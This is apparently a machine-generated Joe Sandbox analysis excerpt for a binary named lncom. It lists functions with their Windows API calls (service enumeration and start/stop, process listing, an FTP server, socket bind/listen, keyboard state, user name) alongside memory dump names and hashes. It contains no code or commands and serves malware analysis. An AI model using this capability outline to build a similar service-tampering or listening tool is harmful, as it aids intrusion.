OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004085E8
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 00408607
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 00408631
CharLowerA.USER32(?,?), ref: 004086B4
OpenServiceA.ADVAPI32(?,?,00000010), ref: 004086D7
StartServiceA.ADVAPI32(?,00000000,00000000,?,?,00000010), ref: 004086E6
CloseServiceHandle.ADVAPI32(?,?,00000000,00000000,?,?,00000010), ref: 004086EE
CloseServiceHandle.ADVAPI32(?,?,00000030,00000003,?,?,?,?,?,?,00000030,00000003,00000000,00000000,?,?), ref: 00408705

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Service$EnumOpenServicesStatus$CharCloseHandleLowerManager$ConfigQueryStart
String ID:
API String ID: 1209395258-0
Opcode ID: a85fa05044f6ce64f5010a0967a9990891f4e0d5ee82dcdbfff2c0d581f0cb07
Instruction ID: f75db05c023299d51e1cfbc8acf65c19ea87008152bf99a37498e7f09a1d5a97
Opcode Fuzzy Hash: a85fa05044f6ce64f5010a0967a9990891f4e0d5ee82dcdbfff2c0d581f0cb07
Instruction Fuzzy Hash: E4413971D00109ABDF16EFD1CD42FEEBBBAAF04304F20406AE604761A1EB765B55DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00408478 Relevance: 12.1, APIs: 8, Instructions: 107serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 0040848F
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 004084AE
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 004084D8
CharLowerA.USER32(?,?), ref: 0040855B
OpenServiceA.ADVAPI32(?,?,00000020), ref: 0040857E
ControlService.ADVAPI32(?,00000001,?,?,?,00000020), ref: 0040858F
CloseServiceHandle.ADVAPI32(?,?,00000001,?,?,?,00000020), ref: 00408597
CloseServiceHandle.ADVAPI32(?,?,00000030,00000003,?,?,?,?,?,?,00000030,00000003,00000000,00000000,?,?), ref: 004085AE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Service$CloseEnumHandleOpenServicesStatus$CharControlLowerManager
String ID:
API String ID: 63135860-0
Opcode ID: 7da5686a269ce965ed0cb3087da4fb5167f33e7166e1110cc2d4e20b2a2ea3cb
Instruction ID: e0c8d0ccf5a1bd829d36549924174632ef56872d62f9ecad59c3358c2549cf8f
Opcode Fuzzy Hash: 7da5686a269ce965ed0cb3087da4fb5167f33e7166e1110cc2d4e20b2a2ea3cb
Instruction Fuzzy Hash: F3414A71D00209ABDF15DFD1CD42BEEBBBAAF08304F20406AE614B61A1EB755B55CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00458658 Relevance: 10.9, APIs: 7, Instructions: 404nativeCOMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 00458927
RestoreDC.GDI32(?,?), ref: 00458998
GetWindowDC.USER32(?,00000000,00458B85), ref: 00458A12
SaveDC.GDI32(?), ref: 00458A49
RestoreDC.GDI32(?,?), ref: 00458AB3
NtdllDefWindowProc_A.NTDLL(?,?,?,?,00000000,00458B85), ref: 00458B67

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: RestoreSaveWindow$NtdllProc_
String ID:
API String ID: 1346906915-0
Opcode ID: c03f9545bf8f6923b4dcb55beb1436f33310f5af1b21d763240d487c1b18678e
Instruction ID: 31b6fe5f51193a87d5c6b56d2352b80b82772257a6090e15de076db0b2556945
Opcode Fuzzy Hash: c03f9545bf8f6923b4dcb55beb1436f33310f5af1b21d763240d487c1b18678e
Instruction Fuzzy Hash: 8EE15D74A00205DFCB10EFAAC98199EB3F5FF58305B25856AE805A7322DF38ED45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047B45C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0047B49B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0047B4B9
GetWindowPlacement.USER32(?,0000002C), ref: 0047B4EF
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0047B516

Strings

,, xrefs: 0047B4DD

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 0d3459ce0bd3ec40f03cba2015cb1c32f4666f619aa73aed6534276c595ff3a4
Instruction ID: 7d4de19043ff9aafff3d231d4ccb4446681934b2f8ce91467611f75d35c36f36
Opcode Fuzzy Hash: 0d3459ce0bd3ec40f03cba2015cb1c32f4666f619aa73aed6534276c595ff3a4
Instruction Fuzzy Hash: 2A210E71600204ABCF50EE69C8C1ADE77A8EF49314F40946AFD1CDF356C778E9458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004124A0 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124B7
Process32First.KERNEL32(000000FF,00000128), ref: 004124EA
CharLowerA.USER32(00000000,000000FF,00000128), ref: 00412530
Process32Next.KERNEL32(000000FF,00000128), ref: 00412570
CloseHandle.KERNEL32(000000FF,000000FF,00000128), ref: 00412585

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Process32$CharCloseCreateFirstHandleLowerNextSnapshotToolhelp32
String ID:
API String ID: 455902402-0
Opcode ID: 59c675f7685809542497acd8408e614650fdb92bd6ebe904de6663ef94242cea
Instruction ID: 98093f690bc65cfaad6cc3a48d2a5cf556687e65c3711f7aba9de3ed43260e5c
Opcode Fuzzy Hash: 59c675f7685809542497acd8408e614650fdb92bd6ebe904de6663ef94242cea
Instruction Fuzzy Hash: E9212A70D1021DABCF10EBA1DC86BEEB7B8FF54318F10456BA404A6252EBB85A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043A784 Relevance: 7.6, APIs: 5, Instructions: 51windownativeCOMMON

Download Yara Rule

APIs

@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage.LNCOM ref: 0043A7AD
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage.LNCOM ref: 0043A7BA
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage.LNCOM ref: 0043A7C7
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage.LNCOM ref: 0043A7D4
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0043A7F6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Ftpsrv@MessageMessages@Server@$Close$AbortClientClosed$qqrr17Data$qqrr17NtdllProc_Request$qqrr17Transfer$qqrr17Window
String ID:
API String ID: 1480413259-0
Opcode ID: 06078cbf3243c4cfde2d953c289997196c6eefdc9311356a883fd5072ad6c7a2
Instruction ID: 3b6d72e1ec6e99e4a3c497831d348a8c10fede6e2340c7e4728630d850e97d82
Opcode Fuzzy Hash: 06078cbf3243c4cfde2d953c289997196c6eefdc9311356a883fd5072ad6c7a2
Instruction Fuzzy Hash: 97113934A44208EFCB00EB98C581C9EBBF4FB0C320F205196E984E7350C739EE529B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00479380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 004794B9
GetKeyboardState.USER32(?,?,?,?,?,004687FF), ref: 00479518

Strings

, xrefs: 004793FC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CaptureKeyboardState
String ID:
API String ID: 2635337824-3916222277
Opcode ID: c115aa9fdc384f52f854d3e487b0e1ed64cc9e87c37e3667f80853cd24278069
Instruction ID: 9e10040168f5266f0c27d09f9995997bb59de0e3ab6775f370db75cb6a71bd6e
Opcode Fuzzy Hash: c115aa9fdc384f52f854d3e487b0e1ed64cc9e87c37e3667f80853cd24278069
Instruction Fuzzy Hash: 8A41C1326042219BCB61EF2DCD85BDA73A6AB04314F00C56BE05DCB366DB3CDD498B89

Uniqueness

Uniqueness Score: -1.00%

Function 00488880 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

MonitorFromWindow, xrefs: 00488897

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 4d6a3fd533c971a5b9f9b52a4899fcb9219734b017a096629bb7776d37819c4f
Instruction ID: 4c935856421083e276fe6eddbaa41942c1e1ee3eda81d9c0580dc907310fdfde
Opcode Fuzzy Hash: 4d6a3fd533c971a5b9f9b52a4899fcb9219734b017a096629bb7776d37819c4f
Instruction Fuzzy Hash: F3018661A011186BAB10FA999D819FF736CEB11304BC8495BE910E3342DF3C9E0993AE

Uniqueness

Uniqueness Score: -1.00%

Function 0044B16C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,00000010,?,?,?,0044AEE9), ref: 0044B17D

Part of subcall function 0044AA18: WSAGetLastError.WS2_32(00000000,0044AAC0), ref: 0044AA39

Part of subcall function 0044B110: WSAAsyncSelect.WS2_32(?,00000000,00000000,?), ref: 0044B13E
Part of subcall function 0044B110: ioctlsocket.WS2_32(?,8004667E), ref: 0044B15C

listen.WS2_32(?,?), ref: 0044B1B1

Strings

bind, xrefs: 0044B182
listen, xrefs: 0044B1B6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AsyncErrorLastSelectbindioctlsocketlisten
String ID: bind$listen
API String ID: 233599514-3336150537
Opcode ID: 24e9cb9112efc52cec7a5db52a08299894b45cf9707a5ad27bc4249a9e3e5901
Instruction ID: 700cd228f1ad2a2506c64cb7795e7db36250ec02867c70d4d11a8042aab96e95
Opcode Fuzzy Hash: 24e9cb9112efc52cec7a5db52a08299894b45cf9707a5ad27bc4249a9e3e5901
Instruction Fuzzy Hash: 28F082227005501AE720A26E8D55B8FA6DD8F9A759F14882FF145D7742CB6CE84283FA

Uniqueness

Uniqueness Score: -1.00%

Function 0048B4A8 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,0048B51A,00000000,0043EE9B), ref: 0048B4C3
FindClose.KERNEL32(00000000,00000000,?,?,?,0048B51A,00000000,0043EE9B), ref: 0048B4CE
FileTimeToLocalFileTime.KERNEL32(?,?,00000000,00000000,?,?,?,0048B51A,00000000,0043EE9B), ref: 0048B4E7
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0048B4F8

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 9eb70d4b70ae12ab15083e4505a46832378fc0f764f44e191d44998e94a158b4
Instruction ID: 65674a35a17ca100e1cdf95b041bf6a1b64ffb2b7af427ad45eea50d58e585f1
Opcode Fuzzy Hash: 9eb70d4b70ae12ab15083e4505a46832378fc0f764f44e191d44998e94a158b4
Instruction Fuzzy Hash: 9FF0A47190060CAACF10EAA58C859CFB3AC9B09318F500797B515E2191EB399B4587A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D564 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(000000FF), ref: 0040D57F
SetErrorMode.KERNEL32(00000001,000000FF), ref: 0040D586
GetDiskFreeSpaceA.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,000000FF), ref: 0040D596
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,000000FF), ref: 0040D59B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Error$Last$DiskFreeModeSpace
String ID:
API String ID: 2419609306-0
Opcode ID: 26dcc9bce2a13c3b312b2e11f76b46b7c26ca385fce3564e3eadc834a84dcd55
Instruction ID: f80ce11ef3a3229fee79eb0667c1c3ce07eed319b3575bac9d45cae431183a76
Opcode Fuzzy Hash: 26dcc9bce2a13c3b312b2e11f76b46b7c26ca385fce3564e3eadc834a84dcd55
Instruction Fuzzy Hash: 83F0E030A4460465CB10BB994D02FDE7798AB55738F30433FF914B52C1DA79580185FD

Uniqueness

Uniqueness Score: -1.00%

Function 0049C0B4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001001,?,00000200,0000000B,00000001,?,?,0049BAC7,?,LC_CTYPE,0000000B,?,00000007,?), ref: 0049C0DB
GetLocaleInfoA.KERNEL32(?,00001002,00000000,00000200), ref: 0049C128

Strings

_.=, xrefs: 0049C0E0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: InfoLocale
String ID: _.=
API String ID: 2299586839-180619938
Opcode ID: f9cd0e6cdf230cb257d7ecef803675781fc06eade2aa413cafeb7f581ae464d4
Instruction ID: d030f1168e77b49b83962382a8283da071e51a3ded550f6485218a268ae28af8
Opcode Fuzzy Hash: f9cd0e6cdf230cb257d7ecef803675781fc06eade2aa413cafeb7f581ae464d4
Instruction Fuzzy Hash: 3241A8B39002046ADF14EB65EC86FAB7B789B88314F1501BFF50496142E97DD9458668

Uniqueness

Uniqueness Score: -1.00%

Function 004102D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,000000FA), ref: 004102F5

Strings

, xrefs: 004103BF
Unkown, xrefs: 00410389

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: NameUser
String ID: $Unkown
API String ID: 2645101109-3091181481
Opcode ID: 869e4c67a6c89f7164dbd54cd6f5e2ce7e55e123686728b671f2165b106a2e11
Instruction ID: f2dd5036042a570a3bbf7887ea6c1bca096069b776bf6c5e5aa6809eba8db9b5
Opcode Fuzzy Hash: 869e4c67a6c89f7164dbd54cd6f5e2ce7e55e123686728b671f2165b106a2e11
Instruction Fuzzy Hash: 3C31F17491024DDBCF00EFD0D945ADEB7B5FF99308F10456AE804B6212E7B85A45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(0000009C), ref: 0040C1EC
GetVersionExA.KERNEL32(00000094,0000009C), ref: 0040C209

Strings

Z, xrefs: 0040C2B1

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Version
String ID: Z
API String ID: 1889659487-1505515367
Opcode ID: 118502916784a0e71dcb64bb1ec82bb1df74e35e727c5b426e277cc94d291b08
Instruction ID: 266d0353aec47bbc987c6d9281f011b2d6ef295bd6528ad971a05c25cd9903fd
Opcode Fuzzy Hash: 118502916784a0e71dcb64bb1ec82bb1df74e35e727c5b426e277cc94d291b08
Instruction Fuzzy Hash: EB210C75D1071CCEDF30CBE08984B9AB6B4BB52314F1082EED50976681D3B85E88DF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00444360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,?,00444666,00444740,?,0000000D,?,00000000,00444707), ref: 00444373

Strings

-0000, xrefs: 00444384
-%.2d%.2d, xrefs: 004443FC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
